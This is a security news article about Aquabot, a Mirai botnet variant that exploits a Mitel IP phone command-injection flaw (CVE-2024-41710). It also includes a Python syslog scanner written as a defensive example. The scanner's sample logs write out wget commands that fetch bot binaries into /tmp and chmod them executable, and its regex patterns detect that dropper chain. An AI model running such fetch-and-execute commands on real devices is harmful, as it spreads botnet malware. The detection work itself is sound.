Recent developments in the cybersecurity landscape have revealed that a new variant of the Mirai botnet, known as Aquabot, is actively targeting a medium-severity vulnerability associated with Mitel IP phones. This vulnerability, identified as CVE-2024-41710, has a CVSS score of 6.8 and involves command injection during the phone’s boot process, allowing malicious actors to execute unauthorized commands.

Aquabot’s targeting includes a range of Mitel devices: the 6800 Series, 6900 Series, 6900w Series SIP Phones, and the Mitel 6970 Conference Unit. Mitel issued a security advisory addressing this vulnerability in July 2024, and a proof-of-concept exploit was made publicly available shortly thereafter.

In addition to CVE-2024-41710, Aquabot exploits several other vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution issue affecting Linksys E-series devices. According to researchers from Akamai, efforts to exploit CVE-2024-41710 have been observed since early January 2025, employing an attack method that closely mirrors the available proof-of-concept for deploying the botnet.

The attack mechanism involves executing a shell script utilizing the “wget” command to download Aquabot onto devices with various CPU architectures. This version of the Mirai variant represents a third iteration, introducing a new “report_kill” function that lets the command-and-control (C2) server know when a termination signal is detected on the infected device; however, no responses from the server have yet been recorded.

Aquabot is engineered to initiate C2 communications upon receiving specific signals and disguises itself by renaming its process to “httpd.x86.” It is also programmed to terminate certain local processes, a behaviour typical either of stealth or of competition with rival botnets for the same device. The group behind Aquabot has allegedly advertised its network of compromised devices as a DDoS-for-hire service on Telegram, under various aliases.
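As an added example (not code from the article or from the Akamai research), the following script shows how a defender might scan device syslog for the infection chain described above: a wget fetch of architecture-named binaries into a writable staging directory, a chmod to make them executable, and a process masquerading as “httpd.x86”. The log format, the list of architecture suffixes, the staging directories and the sample lines are all assumptions constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample syslog lines (not real captures): phone-01 shows the
# dropper chain described in the article, phone-02 shows benign activity.
SAMPLE_LOGS = [
    "2025-01-12T03:14:07Z phone-01 sh: wget http://203.0.113.10/bins/aquabot.x86 -O /tmp/httpd.x86",
    "2025-01-12T03:14:08Z phone-01 sh: wget http://203.0.113.10/bins/aquabot.arm7 -O /tmp/httpd.arm7",
    "2025-01-12T03:14:09Z phone-01 sh: chmod +x /tmp/httpd.x86",
    "2025-01-12T03:14:10Z phone-01 init: started process httpd.x86 pid 2210",
    "2025-01-12T03:20:00Z phone-02 sh: wget https://fw.example.invalid/update.bin -O /var/update.bin",
    "2025-01-12T03:21:00Z phone-02 init: started process httpd pid 411",
]

# Architecture suffixes commonly used to name Mirai-family builds (assumption).
ARCHES = r"(?:x86|x86_64|arm|arm5|arm6|arm7|mips|mipsel|mpsl|sh4|ppc|m68k|spc)"
# Writable staging directories an embedded-device dropper typically uses (assumption).
STAGING = r"/(?:tmp|dev/shm|var/run|var/tmp)/"

RULES = {
    # wget/curl writing an architecture-named file into a staging directory
    "dropper-fetch": re.compile(r"\b(?:wget|curl)\b.*" + STAGING + r"\S*\." + ARCHES + r"\b"),
    # chmod +x on a file in a staging directory
    "staging-exec": re.compile(r"\bchmod\s+\+x\s+" + STAGING),
    # a process named 'httpd' with an architecture suffix appended (the masquerade)
    "masquerade-process": re.compile(r"\bprocess\s+httpd\." + ARCHES + r"\b"),
}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<msg>.*)$")

@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    message: str

def scan(lines):
    """Return one Finding per (line, rule) match, in log order."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the whole scan
        for name, pattern in RULES.items():
            if pattern.search(m["msg"]):
                findings.append(Finding(m["host"], name, m["msg"]))
    return findings

def hosts_with_full_chain(findings):
    """Hosts where fetch, exec and masquerade all occur: the strongest signal."""
    seen = {}
    for f in findings:
        seen.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, rules in seen.items() if rules == set(RULES))

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.host}: {f.rule}: {f.message}")
    print("full chain on:", hosts_with_full_chain(scan(SAMPLE_LOGS)))
```

A single rule firing (a firmware update fetched with wget, for instance) is weak evidence on its own; the full chain on one host is what warrants isolating the device and checking it against the vendor advisory.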

This situation underscores the ongoing threat posed by Mirai and its variants, particularly to internet-connected devices that lack adequate security measures or still run outdated configurations with default passwords. The researchers noted that many threat actors mislead the security community by claiming their botnets exist solely for DDoS testing, while analysis shows them being openly advertised as a DDoS service.

In analyzing Aquabot’s tactics through the lens of the MITRE ATT&CK framework, initial access may involve exploiting known vulnerabilities in the affected devices. The attack reflects potential techniques including exploitation of remote services and command-and-control communication, which may facilitate further privilege escalation and persistence.

The ongoing evolution of the Mirai botnet highlights the pressing need for heightened cybersecurity awareness and proactive measures among businesses, particularly those deploying internet-connected devices. Addressing these vulnerabilities not only mitigates the risk of exploitation but also safeguards organizational assets against potential large-scale DDoS attacks.
